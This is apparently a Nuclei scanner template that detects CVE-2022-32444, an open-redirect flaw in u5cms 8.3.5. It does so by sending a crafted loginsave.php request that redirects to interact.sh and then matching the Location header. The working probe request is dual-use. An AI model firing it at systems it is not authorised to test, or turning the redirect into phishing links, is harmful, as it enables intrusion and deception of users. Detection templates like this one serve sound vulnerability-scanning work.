40 lines
1.3 KiB
YAML
40 lines
1.3 KiB
YAML
id: CVE-2022-32444
|
|
|
|
info:
|
|
name: u5cms v8.3.5 - Open Redirect
|
|
author: 0x_Akoko
|
|
severity: medium
|
|
description: |
|
|
u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php.
|
|
remediation: |
|
|
Apply the latest patch or update to a version that has fixed this vulnerability.
|
|
reference:
|
|
- https://github.com/u5cms/u5cms/issues/50
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-32444
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-32444
|
|
cwe-id: CWE-601
|
|
epss-score: 0.00252
|
|
epss-percentile: 0.62977
|
|
cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: yuba
|
|
product: u5cms
|
|
tags: cve,cve2022,redirect,u5cms,cms
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/loginsave.php?u=http://interact.sh'
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
|
|
|
|
# digest: 490a0046304402203d5c8ef5f1b73f4112d46850c6a5ee2c2c94cf5e6be5f85438b47724d0cd711402205a6bcecba581204d943085b8516cb853969035390c4c42d9a9e7bf7e93607cc6:922c64590222798bb761d5b6d8e72950
|